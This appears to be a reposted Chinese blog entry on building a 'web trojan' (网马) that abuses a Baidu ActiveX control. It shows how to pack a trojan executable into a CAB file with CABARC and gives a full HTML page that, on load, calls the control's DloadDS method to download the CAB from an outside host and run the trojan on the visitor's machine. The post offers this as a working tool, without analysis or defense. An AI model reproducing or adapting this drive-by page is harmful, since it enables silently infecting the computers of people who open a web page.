百度网马工具 's

admin 2017年4月9日06:17:22评论244 views字数 636阅读2分7秒阅读模式
摘要

来源:7jdg's blog百度网马的时想要用到,CAB文件封装器CABARCUsage: CABARC [options] command cabfile [@list] [files] [dest_dir]

来源:7jdg's blog

百度网马的时想要用到,CAB文件封装器CABARC

Usage: CABARC [options] command cabfile [@list] [files] [dest_dir]

Commands:
L List contents of cabinet (e.g. cabarc l test.cab)
N Create new cabinet (e.g. cabarc n test.cab *.c app.mak *.h)
X Extract file(s) from cabinet (e.g. cabarc x test.cab foo*.c)

例如:cabarc n calc.cab muma.exe

就会把muma.exe压缩为calc.cab文件

下面是网马,calc.exe是cab文件里的木马文件,细看cocoruder大叔的文档就明白了
XML/HTML代码

<html>
<head>
<script>
function DowndloadCalcAndRun()
{
com.DloadDS("http://ruder.cdut.net/attach/calc.cab", "calc.exe", 0);
}
</script>
</head>
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
</OBJECT>
<script>
DowndloadCalcAndRun()
</script>
</html>

下载:cab文件封装器.rar

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月9日06:17:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   百度网马工具 'shttps://cn-sec.com/archives/46441.html

发表评论

匿名网友 填写信息